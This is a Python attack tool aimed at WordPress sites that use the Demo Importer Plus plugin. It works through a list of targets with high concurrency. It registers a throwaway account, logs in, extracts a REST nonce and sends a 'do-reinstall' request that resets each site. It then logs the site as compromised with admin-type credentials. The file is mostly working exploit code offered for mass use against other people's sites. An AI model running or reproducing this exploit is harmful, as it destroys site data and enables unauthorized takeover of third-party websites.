#!/usr/bin/env python3 #By: Nxploited from __future__ import annotations import asyncio import aiohttp import socket import sys import os import json import random from datetime import datetime from urllib.parse import urlparse import urllib3 from colorama import Fore, Style, init as color_init urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) color_init(autoreset=True) RESULTS_FILE = "diagnostics_results.txt" PASSED_FILE = "passed_targets.txt" REGISTER_RESULTS_FILE = "register_results.txt" EXPLOIT_RESULTS_FILE = "exploit_results.txt" RESET_RESULTS_FILE = "reset_results.txt" DEFAULT_TARGETS_FILE = "list.txt" DEFAULT_CONCURRENCY = 30 DEFAULT_TIMEOUT = 10 MAX_CONCURRENCY = 200 USER_AGENTS = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/605.1.15", ] DEFAULT_REG_USERNAME = "Nxploited" DEFAULT_REG_PASSWORD = "NxploitedSA" LOGIN_PATH = "/wp-login.php" def now_ts() -> str: return datetime.now().strftime("%Y-%m-%d %H:%M:%S") def time_tag() -> str: return datetime.now().strftime("%H:%M:%S") def rand_ua() -> str: return random.choice(USER_AGENTS) def normalize_url(u: str) -> str: if not u: return "" if not u.startswith(("http://", "https://")): u = "http://" + u p = urlparse(u) return f"{p.scheme}://{p.netloc}" def center_text(s: str, width: int = 80) -> str: if len(s) >= width: return s return s.center(width) def safe_write_line(path: str, line: str) -> None: try: with open(path, "a", encoding="utf-8") as f: f.write(line + "\n") f.flush() try: os.fsync(f.fileno()) except Exception: pass except Exception: pass def print_success(msg: str): tag = time_tag() print(f"[{tag}] {Fore.GREEN + Style.BRIGHT}SUCCESS{Style.RESET_ALL} {msg}") def print_fail(msg: str): tag = time_tag() print(f"[{tag}] {Fore.RED + Style.DIM}FAIL{Style.RESET_ALL} {msg}") def draw_banner(width: int = 90): os.system('cls' if os.name == 'nt' else 'clear') title_lines = [ " _ _ _ _ _ _ _ _ ", " / \\ / |_ __ ) / \\ ) |_ __ /| |_|_ _) |_ |_|_ ", " \\_ \\/ |_ /_ \\_/ /_ _) | | _) |_) | ", " ", ] sub = "WP Email Register · Manual Activation · Demo Importer Plus exploit" github = "GitHub: https://github.com/Nxploited" telegram = "Telegram: @Kxploit" line = "─" * (width - 2) print(Fore.CYAN + "┌" + line + "┐" + Style.RESET_ALL) for tl in title_lines: print(Fore.BLUE + "│" + center_text(tl, width - 2) + "│" + Style.RESET_ALL) print(Fore.CYAN + "├" + line + "┤" + Style.RESET_ALL) print(Fore.MAGENTA + "│" + center_text(sub, width - 2) + "│" + Style.RESET_ALL) print(Fore.GREEN + "│" + center_text(github + " " + telegram, width - 2) + "│" + Style.RESET_ALL) print(Fore.CYAN + "└" + line + "┘" + Style.RESET_ALL) print() async def resolve_dns(host: str) -> dict: loop = asyncio.get_event_loop() res = {"host": host, "ok": False, "addrs": [], "error": None} try: addrs = await loop.run_in_executor(None, socket.getaddrinfo, host, None) ips = sorted({a[4][0] for a in addrs if a and a[4]}) res["ok"] = True res["addrs"] = ips except Exception as e: res["error"] = str(e) return res async def http_get(session: aiohttp.ClientSession, url: str, timeout: int): out = {"url": url, "status": None, "text_head": None, "error": None} try: async with session.get(url, timeout=timeout, ssl=False, allow_redirects=True) as r: out["status"] = r.status txt = await r.text(errors="replace") out["text_head"] = txt[:800] except Exception as e: out["error"] = str(e) return out async def register_user_wordpress( raw_target: str, email: str, username: str, password: str, timeout: int, sem: asyncio.Semaphore ) -> dict: target = normalize_url(raw_target) if not target: return {"target": raw_target, "status": "invalid_target"} async with sem: connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False) async with aiohttp.ClientSession(connector=connector) as session: register_url = f"{target}/wp-login.php?action=register" headers = {"User-Agent": rand_ua(), "Content-Type": "application/x-www-form-urlencoded"} try: async with session.get(register_url, timeout=timeout, ssl=False, headers={"User-Agent": rand_ua()}) as r: reg_page = await r.text(errors="replace") import re nonce = None m = re.search(r'name="_wpnonce"\s+value="([^"]+)"', reg_page) if m: nonce = m.group(1) post_data = { "user_login": username, "user_email": email, "redirect_to": "", "wp-submit": "Register", } if nonce: post_data["_wpnonce"] = nonce async with session.post(register_url, data=post_data, timeout=timeout, ssl=False, headers=headers) as resp: txt = await resp.text(errors="replace") status = resp.status snippet = txt[:400] safe_write_line( REGISTER_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": target, "http_status": status, "body_snippet": snippet, "username": username, "email": email, }, ensure_ascii=False, ), ) print_success(f"Register attempt -> {target} (user={username}, email={email}) [Check your email]") return {"target": target, "status": "register_attempt_sent", "http_status": status} except Exception as e: print_fail(f"Register error {target} -> {e} [Check your email]") safe_write_line( REGISTER_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": target, "status": "register_error", "error": str(e), }, ensure_ascii=False, ), ) return {"target": target, "status": "register_error", "error": str(e)} async def login_and_get_cookies( session: aiohttp.ClientSession, base_url: str, username: str, password: str, timeout: int, ) -> tuple[bool, str]: login_url = f"{base_url}{LOGIN_PATH}" headers = {"User-Agent": rand_ua(), "Content-Type": "application/x-www-form-urlencoded", "Referer": login_url} post_data = { "log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1", "redirect_to": f"{base_url}/wp-admin/", } try: async with session.post( login_url, data=post_data, timeout=timeout, ssl=False, allow_redirects=True, headers=headers, ) as resp: body = await resp.text(errors="replace") final_url = str(resp.url) if "wp-login.php" not in final_url and ("/wp-admin/" in final_url or "dashboard" in body.lower()): return True, final_url if "profile.php" in body.lower() or "logout" in body.lower(): return True, final_url safe_write_line( EXPLOIT_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": base_url, "phase": "login_failed", "status": resp.status, "url": final_url, "body_snippet": body[:400], }, ensure_ascii=False, ), ) return False, final_url except Exception as e: safe_write_line( EXPLOIT_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": base_url, "phase": "login_error", "error": str(e), }, ensure_ascii=False, ), ) return False, "" async def extract_wp_rest_nonce( session: aiohttp.ClientSession, base_url: str, timeout: int, ) -> str | None: url = f"{base_url}/wp-admin/" try: async with session.get(url, timeout=timeout, ssl=False, headers={"User-Agent": rand_ua()}) as resp: txt = await resp.text(errors="replace") import re m = re.search(r'wpApiSettings\s*=\s*({.*?});', txt, re.DOTALL) if m: try: js = m.group(1) js = js.replace("'", '"') j = json.loads(js) nonce = j.get("nonce") if nonce: safe_write_line( EXPLOIT_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": base_url, "phase": "nonce_extracted_wpApiSettings", "nonce": nonce, }, ensure_ascii=False, ), ) return nonce except Exception: pass m2 = re.search(r'elementorOneSettingsData\s*=\s*({.*?});', txt, re.DOTALL) if m2: try: js = m2.group(1) js = js.replace("'", '"') j = json.loads(js) nonce = j.get("wpRestNonce") if nonce: safe_write_line( EXPLOIT_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": base_url, "phase": "nonce_extracted_elementor", "nonce": nonce, }, ensure_ascii=False, ), ) return nonce except Exception: pass safe_write_line( EXPLOIT_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": base_url, "phase": "nonce_not_found", "status": resp.status, }, ensure_ascii=False, ), ) return None except Exception as e: safe_write_line( EXPLOIT_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": base_url, "phase": "nonce_error", "error": str(e), }, ensure_ascii=False, ), ) return None async def do_demo_importer_reset( session: aiohttp.ClientSession, base_url: str, wp_rest_nonce: str, timeout: int, ) -> tuple[bool, str]: ajax_url = f"{base_url}/wp-admin/admin-ajax.php?action=demo_importer_plus" headers = { "User-Agent": rand_ua(), "Content-Type": "application/json", "X-WP-Nonce": wp_rest_nonce, } payload = {"demo_action": "do-reinstall"} try: async with session.post(ajax_url, json=payload, timeout=timeout, ssl=False, headers=headers) as resp: txt = await resp.text(errors="replace") body_snippet = txt[:400] success = False try: j = json.loads(txt) s_val = j.get("success") msg = "" if isinstance(j.get("data"), dict): msg = j["data"].get("message", "") or msg msg = msg or j.get("message", "") or "" if s_val is True and "site has been reset" in msg.lower(): success = True except Exception: if '"success":true' in txt.replace(" ", "").lower() and "site has been reset" in txt.lower(): success = True rec = { "timestamp": now_ts(), "target": base_url, "phase": "do_reinstall", "status": resp.status, "body_snippet": body_snippet, } safe_write_line(RESET_RESULTS_FILE, json.dumps(rec, ensure_ascii=False)) return success, body_snippet except Exception as e: safe_write_line( RESET_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": base_url, "phase": "do_reinstall_error", "error": str(e), }, ensure_ascii=False, ), ) return False, str(e) async def exploit_demo_importer_target( raw_target: str, username: str, password: str, timeout: int, sem: asyncio.Semaphore, ) -> dict: target = normalize_url(raw_target) if not target: return {"target": raw_target, "status": "invalid_target"} async with sem: connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False) async with aiohttp.ClientSession(connector=connector) as session: base = target try: logged_in, final_url = await login_and_get_cookies(session, base, username, password, timeout) if not logged_in: print_fail(f"Login failed -> {base} [Check your email and credentials]") return {"target": base, "status": "login_failed"} nonce = await extract_wp_rest_nonce(session, base, timeout) if not nonce: print_fail(f"Nonce not found -> {base}") return {"target": base, "status": "nonce_not_found"} ok_reset, snippet = await do_demo_importer_reset(session, base, nonce, timeout) if ok_reset: print_success(f'success":true,"message":"Site has been reset successfully" -> {base}') line = f"{base}{LOGIN_PATH} site:{base}{LOGIN_PATH} user:{username} pass:{password} type:admin" safe_write_line(EXPLOIT_RESULTS_FILE, line) return {"target": base, "status": "reset_success", "snippet": snippet} else: print_fail(f"RESET FAIL -> {base}") return {"target": base, "status": "reset_failed", "snippet": snippet} except asyncio.CancelledError: raise except Exception as e: print_fail(f"{base} error: {e}") safe_write_line( EXPLOIT_RESULTS_FILE, json.dumps( { "timestamp": now_ts(), "target": base, "status": "error", "error": str(e), }, ensure_ascii=False, ), ) return {"target": base, "status": "error", "error": str(e)} async def probe_target(raw_target: str, timeout: int, sem: asyncio.Semaphore) -> dict: target = normalize_url(raw_target) parsed = urlparse(target) host = parsed.netloc result = { "timestamp": now_ts(), "target": target, "dns": None, "root": None, "wp_login": None, "admin_ajax": None, "rest_users": None, "errors": [] } async with sem: dns = await resolve_dns(host) result["dns"] = dns if not dns["ok"]: result["errors"].append(f"DNS: {dns.get('error')}") return result connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False) headers = { "User-Agent": rand_ua(), "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", } async with aiohttp.ClientSession(connector=connector, headers=headers) as session: paths = { "root": f"{target}/", "wp_login": f"{target}/wp-login.php", "admin_ajax": f"{target}/wp-admin/admin-ajax.php", "rest_users": f"{target}/wp-json/wp/v2/users", } for key, url in paths.items(): r = await http_get(session, url, timeout) result[key] = r if r.get("error"): result["errors"].append(f"{key}: {r['error']}") else: if r.get("status") in (403, 429, 503, 500): result["errors"].append(f"{key}: HTTP {r.get('status')}") return result async def run_diagnose_mode_async(targets: list[str], concurrency: int, timeout: int): sem = asyncio.Semaphore(concurrency) tasks = [asyncio.create_task(probe_target(t, timeout, sem)) for t in targets] passed = [] failed = [] try: f_res = open(RESULTS_FILE, "w", encoding="utf-8") except Exception: f_res = None for coro in asyncio.as_completed(tasks): try: r = await coro except Exception: print_fail("unknown-target") continue success = (not r.get("errors")) if not success: print_fail(r["target"]) if f_res: try: f_res.write(json.dumps(r, ensure_ascii=False) + "\n") except Exception: pass if success: passed.append(r["target"]) try: with open(PASSED_FILE, "a", encoding="utf-8") as pf: pf.write(r["target"] + "\n") except Exception: pass else: failed.append(r["target"]) if f_res: f_res.close() print() print(Fore.CYAN + "Run complete." + Style.RESET_ALL, end=" ") print(f"{len(passed)} passed (silent), {len(failed)} failed. Results -> {RESULTS_FILE}") return passed, failed async def run_register_mode(targets: list[str], concurrency: int, timeout: int, email: str, username: str, password: str): sem = asyncio.Semaphore(concurrency) tasks = [ asyncio.create_task(register_user_wordpress(t, email, username, password, timeout, sem)) for t in targets ] results = await asyncio.gather(*tasks, return_exceptions=True) return results async def run_exploit_mode(targets: list[str], concurrency: int, timeout: int, username: str, password: str): sem = asyncio.Semaphore(concurrency) tasks = [ asyncio.create_task(exploit_demo_importer_target(t, username, password, timeout, sem)) for t in targets ] results = await asyncio.gather(*tasks, return_exceptions=True) return results def load_targets(file_path: str) -> list[str]: try: with open(file_path, "r", encoding="utf-8") as fh: return [l.strip() for l in fh if l.strip()] except Exception as e: print(f"Failed to load targets file '{file_path}': {e}") return [] def prompt_inputs(): draw_banner() print(Fore.YELLOW + "Select mode:" + Style.RESET_ALL) print(" 1) Diagnose only (probe WordPress endpoints)") print(" 2) Register only (WordPress registration) [After run: check your email]") print(" 3) Exploit Demo Importer Plus (login + do-reinstall) [Ensure account is activated via email first]") mode = input("Mode [1/2/3] [default: 1]: ").strip() or "1" targets_file = input(f"Targets file (one per line) [default: {DEFAULT_TARGETS_FILE}]: ").strip() or DEFAULT_TARGETS_FILE try: concurrency = int(input(f"Concurrency (speed) [default: {DEFAULT_CONCURRENCY}, max {MAX_CONCURRENCY}]: ").strip() or str(DEFAULT_CONCURRENCY)) concurrency = max(1, min(MAX_CONCURRENCY, concurrency)) except Exception: concurrency = DEFAULT_CONCURRENCY try: timeout = int(input(f"Timeout seconds [default: {DEFAULT_TIMEOUT}]: ").strip() or str(DEFAULT_TIMEOUT)) timeout = max(3, timeout) except Exception: timeout = DEFAULT_TIMEOUT email = "" username = DEFAULT_REG_USERNAME password = DEFAULT_REG_PASSWORD if mode == "2": print() print(Fore.CYAN + "Registration mode (after run: check your email)" + Style.RESET_ALL) email = input("Email to register with (required): ").strip() if not email: print("Email is required for registration mode.") sys.exit(1) username = input(f"Username [default: {DEFAULT_REG_USERNAME}]: ").strip() or DEFAULT_REG_USERNAME password = input(f"Password (local note only) [default: {DEFAULT_REG_PASSWORD}]: ").strip() or DEFAULT_REG_PASSWORD if mode == "3": print() print(Fore.CYAN + "Exploit mode (Demo Importer Plus do-reinstall) [ensure account is activated via email]" + Style.RESET_ALL) print(f"Default credentials: user={DEFAULT_REG_USERNAME} pass={DEFAULT_REG_PASSWORD}") username = input(f"Exploit username [default: {DEFAULT_REG_USERNAME}]: ").strip() or DEFAULT_REG_USERNAME password = input(f"Exploit password [default: {DEFAULT_REG_PASSWORD}]: ").strip() or DEFAULT_REG_PASSWORD return mode, targets_file, concurrency, timeout, email, username, password def main(): mode, targets_file, concurrency, timeout, email, username, password = prompt_inputs() targets = load_targets(targets_file) if not targets: print("No targets found. Exiting.") sys.exit(1) try: open(RESULTS_FILE, "a", encoding="utf-8").close() open(PASSED_FILE, "a", encoding="utf-8").close() open(REGISTER_RESULTS_FILE, "a", encoding="utf-8").close() open(EXPLOIT_RESULTS_FILE, "a", encoding="utf-8").close() open(RESET_RESULTS_FILE, "a", encoding="utf-8").close() except Exception: pass print(f"Starting: mode={mode} targets={len(targets)} concurrency={concurrency} timeout={timeout}s") try: if mode == "1": asyncio.run(run_diagnose_mode_async(targets, concurrency, timeout)) elif mode == "2": asyncio.run(run_register_mode(targets, concurrency, timeout, email, username, password)) elif mode == "3": asyncio.run(run_exploit_mode(targets, concurrency, timeout, username, password)) else: print("Unknown mode. Exiting.") except KeyboardInterrupt: print("\nInterrupted by user.") except Exception as e: print(f"Fatal: {e}") if __name__ == "__main__": main()